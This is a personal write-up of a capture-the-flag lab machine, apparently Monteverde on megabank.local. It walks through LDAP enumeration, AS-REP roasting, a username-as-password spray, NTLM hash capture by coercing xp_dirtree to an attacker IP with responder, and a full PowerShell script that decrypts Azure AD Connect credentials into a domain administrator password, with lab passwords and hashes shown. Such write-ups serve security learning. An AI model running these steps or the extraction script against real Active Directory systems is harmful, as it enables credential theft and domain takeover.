## Anonymous User -> `SABatchJobs` ### [[SMB Enumeration|SMB Enumeration]] Domain: megabank.local - null session? - permitted - share enumeration? - not permitted - guest? disabled - `--rid-brute`? not allowed ### [[LDAP - Enumeration|LDAP - Enumeration]] - anonymous bind? - permitted - can get users - checked description field, no passwords considering that we now have a list of usernames we can attempt: - [[AS-REP Roasting]] - Password sprays ```txt # users.txt Guest MONTEVERDE$ AAD_987d7f2f57d2 mhope SABatchJobs svc-ata svc-bexec svc-netapp dgalanos roleary smorgan ``` ### [[AS-REP Roasting]] ``` [λ]- [credz]-> GetNPUsers.py megabank.local/ -dc-ip $RHOST -usersfile users.txt -format hashcat > ASREPRoastHashes.txt [λ]- [credz]-> ls ASREPRoastHashes.txt users.txt xato-net-10-million-usernames.txt [λ]- [credz]-> cat ASREPRoastHashes.txt Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User MONTEVERDE$ doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set ``` seems like we got no love there.... ### Password Sprayz We attempt to leverage the `users.txt` to password spray `username:username` pattern. We get a hit on the SABatch user. - `SABatch:SABatch` **Note to self:** this didnt work on the first spray and i had to look at them hints to even consider trying this. Another fine method added to the book. ## `SABatchJobs`->`mhope` ### WinRM - not permitted ### SMB ![[Pasted image 20250203161700.png]] - `azure_uploads` - appears empty? - `users - `mhope\azure.xml` contains some config params, including another **password** ```sh [λ]- [SABatchJobs]-> cat azure.xml <Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"> <Obj RefId="0"> <TN RefId="0"> <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T> <T>System.Object</T> </TN> <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString> <Props> <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT> <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT> <G N="KeyId">00000000-0000-0000-0000-000000000000</G> <S N="Password">4n0therD4y@n0th3rlt;/S> </Props> </Obj> </Objs>% ``` let's try that password with `mhope`: ![[Pasted image 20250203162534.png]] ## Authenticated External Access `mhope` `mhope:4n0therD4y@n0th3r - No new SMB material - we can get internal access using [[Evil-WinRM]] ### Bloodhound - Reveals that `mhope` is a member of `Azure Admins`. ### Windows Enumeration - Reveals that MSSQL is running. ### MSSQL enumeration Running [[PowerUpSQL]] reveals the following vulnerability: ``` ComputerName : MONTEVERDE Instance : MONTEVERDE Vulnerability : Excessive Privilege - Execute xp_dirtree Description : xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can be used to force the SQL Server service account to authenticate to a remote attacker. The service account password hash can then be captured + cracked or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a machine or managed account isnt being used. Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by default. Remediation : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles. Example command: REVOKE EXECUTE ON xp_dirtree to Public Severity : Medium IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Crack the password hash offline or relay it to another system. Details : The public principal has EXECUTE privileges on the xp_dirtree procedure in the master database. Reference : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/ Author : Scott Sutherland (@_nullbind), NetSPI 2016 ``` I'll fire up responder which will act as an authentication endpoint for the `xp_dirtree` stored procedure enabling me to capture the resulting [[NTLM Hash]] on my attacker machine: ```sh responder.sh tun1 ``` and finally, on the victim machine, in order to trigger the authentication request, I'll invoke the `xp_dirtree` stored procedure with my attacker IP as the designated endpoint: ```powershell sqlcmd -Q "xp_dirtree '\\10.10.14.11\test'" ``` and yatzi, responder yields an NTLMv2-SSP hash: ``` [SMB] NTLMv2-SSP Client : 10.10.10.172 [SMB] NTLMv2-SSP Username : MEGABANK\MONTEVERDE$ [SMB] NTLMv2-SSP Hash : MONTEVERDE$::MEGABANK:0e7840914e0941f2:27C088835B08440B53530165CA5B3B10:010100000000000000CA0639557DDB011C6365E653E85A3800000000020008004C0052003600570001001E00570049004E002D004D0041005A004C003000540047004B0038005700550004003400570049004E002D004D0041005A004C003000540047004B003800570055002E004C005200360057002E004C004F00430041004C00030014004C005200360057002E004C004F00430041004C00050014004C005200360057002E004C004F00430041004C000700080000CA0639557DDB0106000400020000000800300030000000000000000000000000300000570EC26AE8C59528D191BED033F5DD80D2C8784FE5771EF4E778BBAE5EFFE14A0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310031000000000000000000 ``` given the fact that we're dealing with an NTLMv2 hash, we won't be able to use it in a [[Pass The Hash Attack (PTH) - TODO]] attack, and due to the fact that we're dealing with an AD network containing a single instance, there's no possibility of performing an [[NTLMv2 Relay Attack]] either. This leaves us with the sole option of cracking the hash which dosen't crack... ### Azure AD Connect - See [[Azure AD Connect]] A modification to the script is necessary: ```powershell # decrypt.ps1 Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n" # Changed this line to accomdate the custom rather than express installation of MSSQL $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true; Initial Catalog=ADSync" $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close() add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll' $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted) $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}} Write-Host ("Domain: " + $domain.Domain) Write-Host ("Username: " + $username.Username) Write-Host ("Password: " + $password.Password) ``` Execution of the script yields admin credentials: ``` *Evil-WinRM* PS C:\Users\mhope\Documents> .\decrypt.ps1 AD Connect Sync Credential Extract POC (@_xpn_) Domain: MEGABANK.LOCAL Username: administrator Password: d0m@in4dminyeah! ``` ## Privesc - `Administrator` we leverage abovementioned credentials to gain remote access. ## Lessons Learned - Got some practice in using [[MSSQL]] had not done that before using the `sqlcmd` command, neither had I any prior experience using [[PowerUpSQL]]. - I got fuked by the Azure AD Connect section, had to just slavishly follow a writeup, but I did grok the outline of the exploit. - Discovered [go-windapsearch](https://github.com/ropnop/go-windapsearch.git)